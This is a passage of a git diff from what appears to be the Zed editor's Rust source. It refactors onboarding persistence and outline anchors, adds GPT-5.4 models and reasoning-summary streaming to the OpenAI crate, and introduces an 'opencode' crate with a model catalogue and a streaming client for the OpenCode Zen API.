) .on_click(move |_event, _, cx| { cx.open_url("https://zed.dev/docs/multibuffers") }), diff --git a/crates/onboarding/src/onboarding.rs b/crates/onboarding/src/onboarding.rs index 68748afbd62a54fb33060b2812d8977ee94ee46d..808cba456406f915bdd9f593a6647ea3e90c696d 100644 --- a/crates/onboarding/src/onboarding.rs +++ b/crates/onboarding/src/onboarding.rs @@ -1,6 +1,6 @@ use crate::multibuffer_hint::MultibufferHint; use client::{Client, UserStore, zed_urls}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use fs::Fs; use gpui::{ Action, AnyElement, App, AppContext, AsyncWindowContext, Context, Entity, EventEmitter, @@ -194,8 +194,10 @@ pub fn show_onboarding_view(app_state: Arc, cx: &mut App) -> Task gpui::Task>> { + let db = persistence::OnboardingPagesDb::global(cx); window.spawn(cx, async move |cx| { - if let Some(_) = - persistence::ONBOARDING_PAGES.get_onboarding_page(item_id, workspace_id)? - { + if let Some(_) = db.get_onboarding_page(item_id, workspace_id)? { workspace.update(cx, |workspace, cx| Onboarding::new(workspace, cx)) } else { Err(anyhow::anyhow!("No onboarding page to deserialize")) @@ -593,11 +594,12 @@ impl workspace::SerializableItem for Onboarding { ) -> Option>> { let workspace_id = workspace.database_id()?; - Some(cx.background_spawn(async move { - persistence::ONBOARDING_PAGES - .save_onboarding_page(item_id, workspace_id) - .await - })) + let db = persistence::OnboardingPagesDb::global(cx); + Some( + cx.background_spawn( + async move { db.save_onboarding_page(item_id, workspace_id).await }, + ), + ) } fn should_serialize(&self, event: &Self::Event) -> bool { @@ -646,7 +648,7 @@ mod persistence { ]; } - db::static_connection!(ONBOARDING_PAGES, OnboardingPagesDb, [WorkspaceDb]); + db::static_connection!(OnboardingPagesDb, [WorkspaceDb]); impl OnboardingPagesDb { query! { diff --git a/crates/onboarding/src/theme_preview.rs b/crates/onboarding/src/theme_preview.rs index 8bd65d8a2707acdc53333071486f41741398a82a..602695cca6a643d4eb4d3476286bba7fcfe74c40 100644 --- a/crates/onboarding/src/theme_preview.rs +++ b/crates/onboarding/src/theme_preview.rs @@ -87,13 +87,13 @@ impl ThemePreviewTile { let colors = theme.colors(); let syntax = theme.syntax(); - let keyword_color = syntax.get("keyword").color; - let function_color = syntax.get("function").color; - let string_color = syntax.get("string").color; - let comment_color = syntax.get("comment").color; - let variable_color = syntax.get("variable").color; - let type_color = syntax.get("type").color; - let punctuation_color = syntax.get("punctuation").color; + let keyword_color = syntax.style_for_name("keyword").and_then(|s| s.color); + let function_color = syntax.style_for_name("function").and_then(|s| s.color); + let string_color = syntax.style_for_name("string").and_then(|s| s.color); + let comment_color = syntax.style_for_name("comment").and_then(|s| s.color); + let variable_color = syntax.style_for_name("variable").and_then(|s| s.color); + let type_color = syntax.style_for_name("type").and_then(|s| s.color); + let punctuation_color = syntax.style_for_name("punctuation").and_then(|s| s.color); let syntax_colors = [ keyword_color, diff --git a/crates/open_ai/src/open_ai.rs b/crates/open_ai/src/open_ai.rs index e6145e409058a3fe453c4557b2a32cccf6baf16c..c4a3e078d76eb028b90e5b80fe95b1281b795f34 100644 --- a/crates/open_ai/src/open_ai.rs +++ b/crates/open_ai/src/open_ai.rs @@ -90,6 +90,10 @@ pub enum Model { FivePointTwoCodex, #[serde(rename = "gpt-5.3-codex")] FivePointThreeCodex, + #[serde(rename = "gpt-5.4")] + FivePointFour, + #[serde(rename = "gpt-5.4-pro")] + FivePointFourPro, #[serde(rename = "custom")] Custom { name: String, @@ -131,6 +135,8 @@ impl Model { "gpt-5.2" => Ok(Self::FivePointTwo), "gpt-5.2-codex" => Ok(Self::FivePointTwoCodex), "gpt-5.3-codex" => Ok(Self::FivePointThreeCodex), + "gpt-5.4" => Ok(Self::FivePointFour), + "gpt-5.4-pro" => Ok(Self::FivePointFourPro), invalid_id => anyhow::bail!("invalid model id '{invalid_id}'"), } } @@ -153,6 +159,8 @@ impl Model { Self::FivePointTwo => "gpt-5.2", Self::FivePointTwoCodex => "gpt-5.2-codex", Self::FivePointThreeCodex => "gpt-5.3-codex", + Self::FivePointFour => "gpt-5.4", + Self::FivePointFourPro => "gpt-5.4-pro", Self::Custom { name, .. } => name, } } @@ -175,6 +183,8 @@ impl Model { Self::FivePointTwo => "gpt-5.2", Self::FivePointTwoCodex => "gpt-5.2-codex", Self::FivePointThreeCodex => "gpt-5.3-codex", + Self::FivePointFour => "gpt-5.4", + Self::FivePointFourPro => "gpt-5.4-pro", Self::Custom { display_name, .. } => display_name.as_deref().unwrap_or(&self.id()), } } @@ -191,12 +201,14 @@ impl Model { Self::O3 => 200_000, Self::Five => 272_000, Self::FiveCodex => 272_000, - Self::FiveMini => 272_000, - Self::FiveNano => 272_000, + Self::FiveMini => 400_000, + Self::FiveNano => 400_000, Self::FivePointOne => 400_000, Self::FivePointTwo => 400_000, Self::FivePointTwoCodex => 400_000, Self::FivePointThreeCodex => 400_000, + Self::FivePointFour => 1_050_000, + Self::FivePointFourPro => 1_050_000, Self::Custom { max_tokens, .. } => *max_tokens, } } @@ -222,6 +234,8 @@ impl Model { Self::FivePointTwo => Some(128_000), Self::FivePointTwoCodex => Some(128_000), Self::FivePointThreeCodex => Some(128_000), + Self::FivePointFour => Some(128_000), + Self::FivePointFourPro => Some(128_000), } } @@ -230,7 +244,7 @@ impl Model { Self::Custom { reasoning_effort, .. } => reasoning_effort.to_owned(), - Self::FivePointThreeCodex => Some(ReasoningEffort::Medium), + Self::FivePointThreeCodex | Self::FivePointFourPro => Some(ReasoningEffort::Medium), _ => None, } } @@ -241,7 +255,10 @@ impl Model { supports_chat_completions, .. } => *supports_chat_completions, - Self::FiveCodex | Self::FivePointTwoCodex | Self::FivePointThreeCodex => false, + Self::FiveCodex + | Self::FivePointTwoCodex + | Self::FivePointThreeCodex + | Self::FivePointFourPro => false, _ => true, } } @@ -263,6 +280,8 @@ impl Model { | Self::FivePointTwo | Self::FivePointTwoCodex | Self::FivePointThreeCodex + | Self::FivePointFour + | Self::FivePointFourPro | Self::FiveNano => true, Self::O1 | Self::O3 | Self::O3Mini | Model::Custom { .. } => false, } @@ -276,12 +295,27 @@ impl Model { } } +#[derive(Debug, Serialize, Deserialize)] +pub struct StreamOptions { + pub include_usage: bool, +} + +impl Default for StreamOptions { + fn default() -> Self { + Self { + include_usage: true, + } + } +} + #[derive(Debug, Serialize, Deserialize)] pub struct Request { pub model: String, pub messages: Vec, pub stream: bool, #[serde(default, skip_serializing_if = "Option::is_none")] + pub stream_options: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] pub max_completion_tokens: Option, #[serde(default, skip_serializing_if = "Vec::is_empty")] pub stop: Vec, diff --git a/crates/open_ai/src/responses.rs b/crates/open_ai/src/responses.rs index 9196b4a11fbaeeabb9ebe7e59cf106c4d260c267..34dbd46c372a672840d6c7c91f4785dbe8d80521 100644 --- a/crates/open_ai/src/responses.rs +++ b/crates/open_ai/src/responses.rs @@ -55,7 +55,14 @@ pub struct ResponseFunctionCallItem { #[derive(Debug, Serialize, Deserialize)] pub struct ResponseFunctionCallOutputItem { pub call_id: String, - pub output: String, + pub output: ResponseFunctionCallOutputContent, +} + +#[derive(Debug, Serialize, Deserialize)] +#[serde(untagged)] +pub enum ResponseFunctionCallOutputContent { + List(Vec), + Text(String), } #[derive(Debug, Clone, Serialize, Deserialize)] @@ -78,6 +85,16 @@ pub enum ResponseInputContent { #[derive(Serialize, Debug)] pub struct ReasoningConfig { pub effort: ReasoningEffort, + #[serde(skip_serializing_if = "Option::is_none")] + pub summary: Option, +} + +#[derive(Serialize, Debug, Clone, Copy, PartialEq, Eq)] +#[serde(rename_all = "lowercase")] +pub enum ReasoningSummaryMode { + Auto, + Concise, + Detailed, } #[derive(Serialize, Debug)] @@ -150,6 +167,30 @@ pub enum StreamEvent { content_index: Option, text: String, }, + #[serde(rename = "response.reasoning_summary_part.added")] + ReasoningSummaryPartAdded { + item_id: String, + output_index: usize, + summary_index: usize, + }, + #[serde(rename = "response.reasoning_summary_text.delta")] + ReasoningSummaryTextDelta { + item_id: String, + output_index: usize, + delta: String, + }, + #[serde(rename = "response.reasoning_summary_text.done")] + ReasoningSummaryTextDone { + item_id: String, + output_index: usize, + text: String, + }, + #[serde(rename = "response.reasoning_summary_part.done")] + ReasoningSummaryPartDone { + item_id: String, + output_index: usize, + summary_index: usize, + }, #[serde(rename = "response.function_call_arguments.delta")] FunctionCallArgumentsDelta { item_id: String, @@ -219,6 +260,25 @@ pub struct ResponseUsage { pub enum ResponseOutputItem { Message(ResponseOutputMessage), FunctionCall(ResponseFunctionToolCall), + Reasoning(ResponseReasoningItem), + #[serde(other)] + Unknown, +} + +#[derive(Deserialize, Debug, Clone)] +pub struct ResponseReasoningItem { + #[serde(default)] + pub id: Option, + #[serde(default)] + pub summary: Vec, +} + +#[derive(Deserialize, Debug, Clone)] +#[serde(tag = "type", rename_all = "snake_case")] +pub enum ReasoningSummaryPart { + SummaryText { + text: String, + }, #[serde(other)] Unknown, } @@ -356,6 +416,21 @@ pub async fn stream_response( }); } } + ResponseOutputItem::Reasoning(reasoning) => { + if let Some(ref item_id) = reasoning.id { + for part in &reasoning.summary { + if let ReasoningSummaryPart::SummaryText { text } = part { + all_events.push( + StreamEvent::ReasoningSummaryTextDelta { + item_id: item_id.clone(), + output_index, + delta: text.clone(), + }, + ); + } + } + } + } ResponseOutputItem::Unknown => {} } diff --git a/crates/open_path_prompt/Cargo.toml b/crates/open_path_prompt/Cargo.toml index 3418712abf9656cacd670882c3002cf50b3737d7..e635797cfbe042c327066494a36c3552f6736be1 100644 --- a/crates/open_path_prompt/Cargo.toml +++ b/crates/open_path_prompt/Cargo.toml @@ -24,6 +24,7 @@ editor = {workspace = true, features = ["test-support"]} gpui = {workspace = true, features = ["test-support"]} serde_json.workspace = true theme = {workspace = true, features = ["test-support"]} +theme_settings.workspace = true workspace = {workspace = true, features = ["test-support"]} [lints] diff --git a/crates/open_path_prompt/src/file_finder_settings.rs b/crates/open_path_prompt/src/file_finder_settings.rs index 36f05e89bd7a1c73d849e3d72f05a092d0c8ec34..56ea60c20864fc620b43d2e445a1dd7b92edfa65 100644 --- a/crates/open_path_prompt/src/file_finder_settings.rs +++ b/crates/open_path_prompt/src/file_finder_settings.rs @@ -8,6 +8,7 @@ pub struct FileFinderSettings { pub modal_max_width: FileFinderWidth, pub skip_focus_for_active_in_search: bool, pub include_ignored: Option, + pub include_channels: bool, } impl Settings for FileFinderSettings { @@ -23,6 +24,7 @@ impl Settings for FileFinderSettings { settings::IncludeIgnoredContent::Indexed => Some(false), settings::IncludeIgnoredContent::Smart => None, }, + include_channels: file_finder.include_channels.unwrap(), } } } diff --git a/crates/open_path_prompt/src/open_path_prompt_tests.rs b/crates/open_path_prompt/src/open_path_prompt_tests.rs index eba3a3e03be55c210f7b4ebd4fad5abc3842e74b..3acd74bdc456b8616229d30ea1da343073685e30 100644 --- a/crates/open_path_prompt/src/open_path_prompt_tests.rs +++ b/crates/open_path_prompt/src/open_path_prompt_tests.rs @@ -410,7 +410,7 @@ async fn test_open_path_prompt_with_show_hidden(cx: &mut TestAppContext) { fn init_test(cx: &mut TestAppContext) -> Arc { cx.update(|cx| { let state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); state diff --git a/crates/opencode/Cargo.toml b/crates/opencode/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..758d2f2479b9f8be2a2ed53d08e40a5cf510f286 --- /dev/null +++ b/crates/opencode/Cargo.toml @@ -0,0 +1,27 @@ +[package] +name = "opencode" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[lib] +path = "src/opencode.rs" +test = false + +[features] +default = [] +schemars = ["dep:schemars"] + +[dependencies] +anyhow.workspace = true +futures.workspace = true +google_ai.workspace = true +http_client.workspace = true +schemars = { workspace = true, optional = true } +serde.workspace = true +serde_json.workspace = true +strum.workspace = true diff --git a/crates/supermaven/LICENSE-GPL b/crates/opencode/LICENSE-GPL similarity index 100% rename from crates/supermaven/LICENSE-GPL rename to crates/opencode/LICENSE-GPL diff --git a/crates/opencode/src/opencode.rs b/crates/opencode/src/opencode.rs new file mode 100644 index 0000000000000000000000000000000000000000..a44ea7edebe660cbf27dd2d6517fa08b358859d8 --- /dev/null +++ b/crates/opencode/src/opencode.rs @@ -0,0 +1,453 @@ +use anyhow::{Result, anyhow}; +use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::BoxStream}; +use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest}; +use serde::{Deserialize, Serialize}; +use strum::EnumIter; + +pub const OPENCODE_API_URL: &str = "https://opencode.ai/zen"; + +#[derive(Clone, Copy, Debug, Default, PartialEq, Eq, Serialize, Deserialize)] +#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] +#[serde(rename_all = "snake_case")] +pub enum ApiProtocol { + #[default] + Anthropic, + OpenAiResponses, + OpenAiChat, + Google, +} + +#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] +#[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)] +pub enum Model { + // -- Anthropic protocol models -- + #[serde(rename = "claude-opus-4-6")] + ClaudeOpus4_6, + #[serde(rename = "claude-opus-4-5")] + ClaudeOpus4_5, + #[serde(rename = "claude-opus-4-1")] + ClaudeOpus4_1, + #[default] + #[serde(rename = "claude-sonnet-4-6")] + ClaudeSonnet4_6, + #[serde(rename = "claude-sonnet-4-5")] + ClaudeSonnet4_5, + #[serde(rename = "claude-sonnet-4")] + ClaudeSonnet4, + #[serde(rename = "claude-haiku-4-5")] + ClaudeHaiku4_5, + #[serde(rename = "claude-3-5-haiku")] + Claude3_5Haiku, + + // -- OpenAI Responses API models -- + #[serde(rename = "gpt-5.4")] + Gpt5_4, + #[serde(rename = "gpt-5.4-pro")] + Gpt5_4Pro, + #[serde(rename = "gpt-5.4-mini")] + Gpt5_4Mini, + #[serde(rename = "gpt-5.4-nano")] + Gpt5_4Nano, + #[serde(rename = "gpt-5.3-codex")] + Gpt5_3Codex, + #[serde(rename = "gpt-5.3-codex-spark")] + Gpt5_3Spark, + #[serde(rename = "gpt-5.2")] + Gpt5_2, + #[serde(rename = "gpt-5.2-codex")] + Gpt5_2Codex, + #[serde(rename = "gpt-5.1")] + Gpt5_1, + #[serde(rename = "gpt-5.1-codex")] + Gpt5_1Codex, + #[serde(rename = "gpt-5.1-codex-max")] + Gpt5_1CodexMax, + #[serde(rename = "gpt-5.1-codex-mini")] + Gpt5_1CodexMini, + #[serde(rename = "gpt-5")] + Gpt5, + #[serde(rename = "gpt-5-codex")] + Gpt5Codex, + #[serde(rename = "gpt-5-nano")] + Gpt5Nano, + + // -- Google protocol models -- + #[serde(rename = "gemini-3.1-pro")] + Gemini3_1Pro, + #[serde(rename = "gemini-3-flash")] + Gemini3Flash, + + // -- OpenAI Chat Completions protocol models -- + #[serde(rename = "minimax-m2.5")] + MiniMaxM2_5, + #[serde(rename = "minimax-m2.5-free")] + MiniMaxM2_5Free, + #[serde(rename = "glm-5")] + Glm5, + #[serde(rename = "kimi-k2.5")] + KimiK2_5, + #[serde(rename = "mimo-v2-pro-free")] + MimoV2ProFree, + #[serde(rename = "mimo-v2-omni-free")] + MimoV2OmniFree, + #[serde(rename = "mimo-v2-flash-free")] + MimoV2FlashFree, + #[serde(rename = "trinity-large-preview-free")] + TrinityLargePreviewFree, + #[serde(rename = "big-pickle")] + BigPickle, + #[serde(rename = "nemotron-3-super-free")] + Nemotron3SuperFree, + + // -- Custom model -- + #[serde(rename = "custom")] + Custom { + name: String, + display_name: Option, + max_tokens: u64, + max_output_tokens: Option, + protocol: ApiProtocol, + }, +} + +impl Model { + pub fn default_fast() -> Self { + Self::ClaudeHaiku4_5 + } + + pub fn id(&self) -> &str { + match self { + Self::ClaudeOpus4_6 => "claude-opus-4-6", + Self::ClaudeOpus4_5 => "claude-opus-4-5", + Self::ClaudeOpus4_1 => "claude-opus-4-1", + Self::ClaudeSonnet4_6 => "claude-sonnet-4-6", + Self::ClaudeSonnet4_5 => "claude-sonnet-4-5", + Self::ClaudeSonnet4 => "claude-sonnet-4", + Self::ClaudeHaiku4_5 => "claude-haiku-4-5", + Self::Claude3_5Haiku => "claude-3-5-haiku", + + Self::Gpt5_4 => "gpt-5.4", + Self::Gpt5_4Pro => "gpt-5.4-pro", + Self::Gpt5_4Mini => "gpt-5.4-mini", + Self::Gpt5_4Nano => "gpt-5.4-nano", + Self::Gpt5_3Codex => "gpt-5.3-codex", + Self::Gpt5_3Spark => "gpt-5.3-codex-spark", + Self::Gpt5_2 => "gpt-5.2", + Self::Gpt5_2Codex => "gpt-5.2-codex", + Self::Gpt5_1 => "gpt-5.1", + Self::Gpt5_1Codex => "gpt-5.1-codex", + Self::Gpt5_1CodexMax => "gpt-5.1-codex-max", + Self::Gpt5_1CodexMini => "gpt-5.1-codex-mini", + Self::Gpt5 => "gpt-5", + Self::Gpt5Codex => "gpt-5-codex", + Self::Gpt5Nano => "gpt-5-nano", + + Self::Gemini3_1Pro => "gemini-3.1-pro", + Self::Gemini3Flash => "gemini-3-flash", + + Self::MiniMaxM2_5 => "minimax-m2.5", + Self::MiniMaxM2_5Free => "minimax-m2.5-free", + Self::Glm5 => "glm-5", + Self::KimiK2_5 => "kimi-k2.5", + Self::MimoV2ProFree => "mimo-v2-pro-free", + Self::MimoV2OmniFree => "mimo-v2-omni-free", + Self::MimoV2FlashFree => "mimo-v2-flash-free", + Self::TrinityLargePreviewFree => "trinity-large-preview-free", + Self::BigPickle => "big-pickle", + Self::Nemotron3SuperFree => "nemotron-3-super-free", + + Self::Custom { name, .. } => name, + } + } + + pub fn display_name(&self) -> &str { + match self { + Self::ClaudeOpus4_6 => "Claude Opus 4.6", + Self::ClaudeOpus4_5 => "Claude Opus 4.5", + Self::ClaudeOpus4_1 => "Claude Opus 4.1", + Self::ClaudeSonnet4_6 => "Claude Sonnet 4.6", + Self::ClaudeSonnet4_5 => "Claude Sonnet 4.5", + Self::ClaudeSonnet4 => "Claude Sonnet 4", + Self::ClaudeHaiku4_5 => "Claude Haiku 4.5", + Self::Claude3_5Haiku => "Claude Haiku 3.5", + + Self::Gpt5_4 => "GPT 5.4", + Self::Gpt5_4Pro => "GPT 5.4 Pro", + Self::Gpt5_4Mini => "GPT 5.4 Mini", + Self::Gpt5_4Nano => "GPT 5.4 Nano", + Self::Gpt5_3Codex => "GPT 5.3 Codex", + Self::Gpt5_3Spark => "GPT 5.3 Codex Spark", + Self::Gpt5_2 => "GPT 5.2", + Self::Gpt5_2Codex => "GPT 5.2 Codex", + Self::Gpt5_1 => "GPT 5.1", + Self::Gpt5_1Codex => "GPT 5.1 Codex", + Self::Gpt5_1CodexMax => "GPT 5.1 Codex Max", + Self::Gpt5_1CodexMini => "GPT 5.1 Codex Mini", + Self::Gpt5 => "GPT 5", + Self::Gpt5Codex => "GPT 5 Codex", + Self::Gpt5Nano => "GPT 5 Nano", + + Self::Gemini3_1Pro => "Gemini 3.1 Pro", + Self::Gemini3Flash => "Gemini 3 Flash", + + Self::MiniMaxM2_5 => "MiniMax M2.5", + Self::MiniMaxM2_5Free => "MiniMax M2.5 Free", + Self::Glm5 => "GLM 5", + Self::KimiK2_5 => "Kimi K2.5", + Self::MimoV2ProFree => "MiMo V2 Pro Free", + Self::MimoV2OmniFree => "MiMo V2 Omni Free", + Self::MimoV2FlashFree => "MiMo V2 Flash Free", + Self::TrinityLargePreviewFree => "Trinity Large Preview Free", + Self::BigPickle => "Big Pickle", + Self::Nemotron3SuperFree => "Nemotron 3 Super Free", + + Self::Custom { + name, display_name, .. + } => display_name.as_deref().unwrap_or(name), + } + } + + pub fn protocol(&self) -> ApiProtocol { + match self { + Self::ClaudeOpus4_6 + | Self::ClaudeOpus4_5 + | Self::ClaudeOpus4_1 + | Self::ClaudeSonnet4_6 + | Self::ClaudeSonnet4_5 + | Self::ClaudeSonnet4 + | Self::ClaudeHaiku4_5 + | Self::Claude3_5Haiku => ApiProtocol::Anthropic, + + Self::Gpt5_4 + | Self::Gpt5_4Pro + | Self::Gpt5_4Mini + | Self::Gpt5_4Nano + | Self::Gpt5_3Codex + | Self::Gpt5_3Spark + | Self::Gpt5_2 + | Self::Gpt5_2Codex + | Self::Gpt5_1 + | Self::Gpt5_1Codex + | Self::Gpt5_1CodexMax + | Self::Gpt5_1CodexMini + | Self::Gpt5 + | Self::Gpt5Codex + | Self::Gpt5Nano => ApiProtocol::OpenAiResponses, + + Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google, + + Self::MiniMaxM2_5 + | Self::MiniMaxM2_5Free + | Self::Glm5 + | Self::KimiK2_5 + | Self::MimoV2ProFree + | Self::MimoV2OmniFree + | Self::MimoV2FlashFree + | Self::TrinityLargePreviewFree + | Self::BigPickle + | Self::Nemotron3SuperFree => ApiProtocol::OpenAiChat, + + Self::Custom { protocol, .. } => *protocol, + } + } + + pub fn max_token_count(&self) -> u64 { + match self { + // Anthropic models + Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6 => 1_000_000, + Self::ClaudeOpus4_5 | Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4 => 200_000, + Self::ClaudeOpus4_1 => 200_000, + Self::ClaudeHaiku4_5 => 200_000, + Self::Claude3_5Haiku => 200_000, + + // OpenAI models + Self::Gpt5_4 | Self::Gpt5_4Pro => 1_050_000, + Self::Gpt5_4Mini | Self::Gpt5_4Nano => 400_000, + Self::Gpt5_3Codex => 400_000, + Self::Gpt5_3Spark => 128_000, + Self::Gpt5_2 | Self::Gpt5_2Codex => 400_000, + Self::Gpt5_1 | Self::Gpt5_1Codex | Self::Gpt5_1CodexMax | Self::Gpt5_1CodexMini => { + 400_000 + } + Self::Gpt5 | Self::Gpt5Codex | Self::Gpt5Nano => 400_000, + + // Google models + Self::Gemini3_1Pro => 1_048_576, + Self::Gemini3Flash => 1_048_576, + + // OpenAI-compatible models + Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 196_608, + Self::Glm5 => 200_000, + Self::KimiK2_5 => 262_144, + Self::MimoV2ProFree => 1_048_576, + Self::MimoV2OmniFree | Self::MimoV2FlashFree => 262_144, + Self::TrinityLargePreviewFree => 131_072, + Self::BigPickle => 200_000, + Self::Nemotron3SuperFree => 262_144, + + Self::Custom { max_tokens, .. } => *max_tokens, + } + } + + pub fn max_output_tokens(&self) -> Option { + match self { + // Anthropic models + Self::ClaudeOpus4_6 => Some(128_000), + Self::ClaudeSonnet4_6 => Some(64_000), + Self::ClaudeOpus4_5 + | Self::ClaudeOpus4_1 + | Self::ClaudeSonnet4_5 + | Self::ClaudeSonnet4 + | Self::ClaudeHaiku4_5 => Some(64_000), + Self::Claude3_5Haiku => Some(8_192), + + // OpenAI models + Self::Gpt5_4 + | Self::Gpt5_4Pro + | Self::Gpt5_4Mini + | Self::Gpt5_4Nano + | Self::Gpt5_3Codex + | Self::Gpt5_3Spark + | Self::Gpt5_2 + | Self::Gpt5_2Codex + | Self::Gpt5_1 + | Self::Gpt5_1Codex + | Self::Gpt5_1CodexMax + | Self::Gpt5_1CodexMini + | Self::Gpt5 + | Self::Gpt5Codex + | Self::Gpt5Nano => Some(128_000), + + // Google models + Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536), + + // OpenAI-compatible models + Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(65_536), + Self::Glm5 | Self::BigPickle => Some(128_000), + Self::KimiK2_5 => Some(65_536), + Self::MimoV2ProFree => Some(131_072), + Self::MimoV2OmniFree | Self::MimoV2FlashFree => Some(65_536), + Self::TrinityLargePreviewFree | Self::Nemotron3SuperFree => Some(16_384), + + Self::Custom { + max_output_tokens, .. + } => *max_output_tokens, + } + } + + pub fn supports_tools(&self) -> bool { + true + } + + pub fn supports_images(&self) -> bool { + match self { + // Anthropic models support images + Self::ClaudeOpus4_6 + | Self::ClaudeOpus4_5 + | Self::ClaudeOpus4_1 + | Self::ClaudeSonnet4_6 + | Self::ClaudeSonnet4_5 + | Self::ClaudeSonnet4 + | Self::ClaudeHaiku4_5 + | Self::Claude3_5Haiku => true, + + // OpenAI models support images + Self::Gpt5_4 + | Self::Gpt5_4Pro + | Self::Gpt5_4Mini + | Self::Gpt5_4Nano + | Self::Gpt5_3Codex + | Self::Gpt5_3Spark + | Self::Gpt5_2 + | Self::Gpt5_2Codex + | Self::Gpt5_1 + | Self::Gpt5_1Codex + | Self::Gpt5_1CodexMax + | Self::Gpt5_1CodexMini + | Self::Gpt5 + | Self::Gpt5Codex + | Self::Gpt5Nano => true, + + // Google models support images + Self::Gemini3_1Pro | Self::Gemini3Flash => true, + + // OpenAI-compatible models — conservative default + Self::MiniMaxM2_5 + | Self::MiniMaxM2_5Free + | Self::Glm5 + | Self::KimiK2_5 + | Self::MimoV2ProFree + | Self::MimoV2OmniFree + | Self::MimoV2FlashFree + | Self::TrinityLargePreviewFree + | Self::BigPickle + | Self::Nemotron3SuperFree => false, + + Self::Custom { protocol, .. } => matches!( + protocol, + ApiProtocol::Anthropic + | ApiProtocol::OpenAiResponses + | ApiProtocol::OpenAiChat + | ApiProtocol::Google + ), + } + } +} + +/// Stream generate content for Google models via OpenCode Zen. +/// +/// Unlike `google_ai::stream_generate_content()`, this uses: +/// - `/v1/models/{model}` path (not `/v1beta/models/{model}`) +/// - `Authorization: Bearer` header (not `key=` query param) +pub async fn stream_generate_content_zen( + client: &dyn HttpClient, + api_url: &str, + api_key: &str, + request: google_ai::GenerateContentRequest, +) -> Result>> { + let api_key = api_key.trim(); + + let model_id = &request.model.model_id; + + let uri = format!("{api_url}/v1/models/{model_id}:streamGenerateContent?alt=sse"); + + let request_builder = HttpRequest::builder() + .method(Method::POST) + .uri(uri) + .header("Content-Type", "application/json") + .header("Authorization", format!("Bearer {api_key}")); + + let request = request_builder.body(AsyncBody::from(serde_json::to_string(&request)?))?; + let mut response = client.send(request).await?; + if response.status().is_success() { + let reader = BufReader::new(response.into_body()); + Ok(reader + .lines() + .filter_map(|line| async move { + match line { + Ok(line) => { + if let Some(line) = line.strip_prefix("data: ") { + match serde_json::from_str(line) { + Ok(response) => Some(Ok(response)), + Err(error) => { + Some(Err(anyhow!("Error parsing JSON: {error:?}\n{line:?}"))) + } + } + } else { + None + } + } + Err(error) => Some(Err(anyhow!(error))), + } + }) + .boxed()) + } else { + let mut text = String::new(); + response.body_mut().read_to_string(&mut text).await?; + Err(anyhow!( + "error during streamGenerateContent via OpenCode Zen, status code: {:?}, body: {}", + response.status(), + text + )) + } +} diff --git a/crates/outline/Cargo.toml b/crates/outline/Cargo.toml index 905f323624437d988ff9a9eb3bde4f9a7becaa91..2ce031bd4605e6c5dfc32e7f76be7493924af825 100644 --- a/crates/outline/Cargo.toml +++ b/crates/outline/Cargo.toml @@ -22,6 +22,7 @@ picker.workspace = true settings.workspace = true smol.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true @@ -38,6 +39,4 @@ project = { workspace = true, features = ["test-support"] } rope.workspace = true serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } -tree-sitter-rust.workspace = true -tree-sitter-typescript.workspace = true workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/outline/src/outline.rs b/crates/outline/src/outline.rs index 454f6f0b578ce25785f0a356251c8af64776772f..af5671632fdac175e5d31ae15c5890d439b7860f 100644 --- a/crates/outline/src/outline.rs +++ b/crates/outline/src/outline.rs @@ -1,8 +1,5 @@ use std::ops::Range; -use std::{ - cmp::{self, Reverse}, - sync::Arc, -}; +use std::{cmp, sync::Arc}; use editor::scroll::ScrollOffset; use editor::{Anchor, AnchorRangeExt, Editor, scroll::Autoscroll}; @@ -17,7 +14,8 @@ use language::{Outline, OutlineItem}; use ordered_float::OrderedFloat; use picker::{Picker, PickerDelegate}; use settings::Settings; -use theme::{ActiveTheme, ThemeSettings}; +use theme::ActiveTheme; +use theme_settings::ThemeSettings; use ui::{ListItem, ListItemSpacing, prelude::*}; use util::ResultExt; use workspace::{DismissDecision, ModalView}; @@ -81,29 +79,37 @@ fn outline_for_editor( cx: &mut App, ) -> Option>>> { let multibuffer = editor.read(cx).buffer().read(cx).snapshot(cx); - let (excerpt_id, _, buffer_snapshot) = multibuffer.as_singleton()?; + let buffer_snapshot = multibuffer.as_singleton()?; let buffer_id = buffer_snapshot.remote_id(); let task = editor.update(cx, |editor, cx| editor.buffer_outline_items(buffer_id, cx)); Some(cx.background_executor().spawn(async move { task.await .into_iter() - .map(|item| OutlineItem { - depth: item.depth, - range: Anchor::range_in_buffer(excerpt_id, item.range), - source_range_for_text: Anchor::range_in_buffer( - excerpt_id, - item.source_range_for_text, - ), - text: item.text, - highlight_ranges: item.highlight_ranges, - name_ranges: item.name_ranges, - body_range: item - .body_range - .map(|r| Anchor::range_in_buffer(excerpt_id, r)), - annotation_range: item - .annotation_range - .map(|r| Anchor::range_in_buffer(excerpt_id, r)), + .filter_map(|item| { + Some(OutlineItem { + depth: item.depth, + range: multibuffer.anchor_in_buffer(item.range.start)? + ..multibuffer.anchor_in_buffer(item.range.end)?, + source_range_for_text: multibuffer + .anchor_in_buffer(item.source_range_for_text.start)? + ..multibuffer.anchor_in_buffer(item.source_range_for_text.end)?, + text: item.text, + highlight_ranges: item.highlight_ranges, + name_ranges: item.name_ranges, + body_range: item.body_range.and_then(|r| { + Some( + multibuffer.anchor_in_buffer(r.start)? + ..multibuffer.anchor_in_buffer(r.end)?, + ) + }), + annotation_range: item.annotation_range.and_then(|r| { + Some( + multibuffer.anchor_in_buffer(r.start)? + 